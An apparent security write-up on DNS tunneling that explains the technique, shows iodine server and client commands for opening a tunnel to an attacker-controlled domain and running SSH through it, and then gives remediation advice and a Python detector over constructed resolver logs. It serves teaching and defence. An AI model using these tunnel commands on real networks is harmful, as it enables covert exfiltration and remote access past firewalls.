Tunneling
Protocol tunneling is the practice of carrying the traffic of one protocol inside another protocol.
Carrying arbitrary TCP or UDP traffic (for example HTTP, FTP or SSH) inside DNS packets is called DNS tunneling.
Why use the DNS protocol for tunneling?
To restrict Internet access, protocols such as HTTP, HTTPS and SSH can be blocked at the firewalls of corporate internal networks.
DNS packets, however, usually have no such rules written for them: blocking DNS is generally avoided because it would break normal internal network traffic. Because DNS requests are designed to look up domain names, there are few restrictions on the data they can carry.
This makes DNS a channel for smuggling data through a network, and the DNS protocol may be chosen to tunnel malware traffic and other data through a client-server model.
DNS Tunneling Attack
First, we register the A record and NS record of the domain to be used for the attack, so that the tunnel domain points to the attacker's server.
We start the DNS tunnel server on the attacker machine with the iodined tool.
iodined -c -f 10.0.0.1 -P test t.example.com
Here 10.0.0.1 is the address the server takes on the tunnel interface and t.example.com is the tunnel domain.
-f keeps the tool running in the foreground.
-P specifies the password used for authentication.
-c disables checking the client IP on every request.
We open the DNS tunnel connection on the target (client) machine with the iodine tool.
iodine -I 50 -f -P test t.example.com
-I sets the maximum interval between requests, to prevent DNS timeouts.
We observe that the target machine receives an IP address on the dns0 tunnel interface.
We then connect over SSH through the DNS tunnel.
Impact
Data can be embedded in DNS query packets and in the answers to those queries. With this method, data can be sent out to the internet without being inspected.
An attacker could infect a computer behind the company’s firewall with malware. Since DNS requests are always allowed in and out of the firewall, the infected computer is allowed to send queries to the DNS resolver. The DNS resolver directs the query to the server where the tunnel connection is located. A connection is established between the target machine and the attacker through the DNS resolver, and this tunnel can be used to exfiltrate data or for other malicious purposes.
Since there is no direct connection between the attacker and the target machine, the attacker is harder to trace.
Remediation
It is recommended that users' external domain resolution requests be passed through a web proxy and that the relevant signatures be enabled on IPS systems.
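Signatures on an IPS are one side of remediation; the other is looking at resolver logs for the traffic shape that the tunneling mechanism above produces: long, high-entropy labels under one parent domain, names that never repeat (so caching cannot absorb them) and uncommon record types such as NULL, which iodine uses by default. The script below is an added example, not code from the page or from the iodine project. The log format ("client qtype qname", one query per line), the sample log lines and the thresholds (LONG_LABEL, HIGH_ENTROPY, ODD_QTYPES) are all constructed assumptions; the registrable domain is approximated by the last two labels, which a real deployment should replace with a Public Suffix List lookup.

```python
"""Heuristic DNS tunneling detector run over constructed resolver log lines."""
import math
from collections import Counter, defaultdict

# Constructed sample log lines (assumption, not from the page): "<client> <qtype> <qname>".
# The 10.1.2.3/10.1.2.4 lines are ordinary lookups; the 10.1.2.5 lines mimic
# iodine-style traffic: long base32 labels under one parent domain, NULL/TXT qtypes.
SAMPLE_LOG = """\
10.1.2.3 A www.example.org
10.1.2.3 AAAA mail.example.org
10.1.2.4 A cdn.example.net
10.1.2.5 NULL pmf4y7zkqwvshbp3ekzwuq6cb5pqxs5nexgjxu3o.t.example.com
10.1.2.5 NULL 0abc3v7hm3zq5mklkz2wpiqxyvdlgpo5bxjbsh5k.t.example.com
10.1.2.5 TXT yzq6hlmfy2gw4ccq2sjolrjwtygzkwxeh7kqwz6h.t.example.com
10.1.2.5 NULL hq4ml3k6ysa2nxr7wqzjwgcv5qfrhtfl7vznwb4h.t.example.com
10.1.2.5 NULL u7gkzr3cbp5ofywn4u3sjtqvmhkbe6lzxyycqzt2.t.example.com
10.1.2.5 TXT 3nsfwa7hzmqxoc2yev6klrjbu6pyddbkxgp4hz2w.t.example.com
10.1.2.3 A www.example.org
"""

# Thresholds are assumptions chosen for this example; tune them on your own baseline.
LONG_LABEL = 30              # labels in normal hostnames are rarely this long
HIGH_ENTROPY = 3.5           # bits/char; base32-encoded payloads approach log2(32) = 5
ODD_QTYPES = {"NULL", "TXT"}  # iodine defaults to NULL; TXT is a noisier indicator


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character (0.0 for an empty or single-symbol string)."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def split_name(qname: str):
    """Return (subdomain, registrable) using the last two labels as the
    registrable domain (simplification; use the Public Suffix List in practice)."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) <= 2:
        return "", ".".join(labels)
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def query_indicators(qtype: str, qname: str) -> list:
    """Per-query tunneling indicators; an empty list means nothing unusual."""
    sub, _ = split_name(qname)
    reasons = []
    if any(len(label) > LONG_LABEL for label in sub.split(".") if label):
        reasons.append("long_label")
    if shannon_entropy(sub.replace(".", "")) > HIGH_ENTROPY:
        reasons.append("high_entropy")
    if qtype.upper() in ODD_QTYPES:
        reasons.append("qtype_" + qtype.lower())
    return reasons


def analyze(log_text: str) -> dict:
    """Aggregate per registrable domain and decide which ones look like tunnels."""
    stats = defaultdict(lambda: {"queries": 0, "subdomains": set(),
                                 "flagged": 0, "reasons": Counter()})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # skip malformed lines instead of aborting the whole run
        _client, qtype, qname = parts
        sub, base = split_name(qname)
        entry = stats[base]
        entry["queries"] += 1
        entry["subdomains"].add(sub)
        reasons = query_indicators(qtype, qname)
        if reasons:
            entry["flagged"] += 1
            entry["reasons"].update(reasons)

    report = {}
    for base, entry in stats.items():
        unique_ratio = len(entry["subdomains"]) / entry["queries"]
        report[base] = {
            "queries": entry["queries"],
            "unique_subdomains": len(entry["subdomains"]),
            "flagged": entry["flagged"],
            "reasons": dict(entry["reasons"]),
            # Several individually odd queries, or a steady stream of names that
            # never repeat (encoded data defeats resolver caching by design).
            "suspicious": entry["flagged"] >= 3
            or (entry["queries"] >= 5 and unique_ratio >= 0.9),
        }
    return report


if __name__ == "__main__":
    for base, info in analyze(SAMPLE_LOG).items():
        print(base, "SUSPICIOUS" if info["suspicious"] else "ok", info)
```

Run against the constructed log, example.com is reported as suspicious (six flagged queries, all with long labels and NULL/TXT types) while example.org and example.net are not. In production, feed it real resolver or passive-DNS logs and raise the per-domain thresholds to match normal CDN and mail-provider noise before alerting.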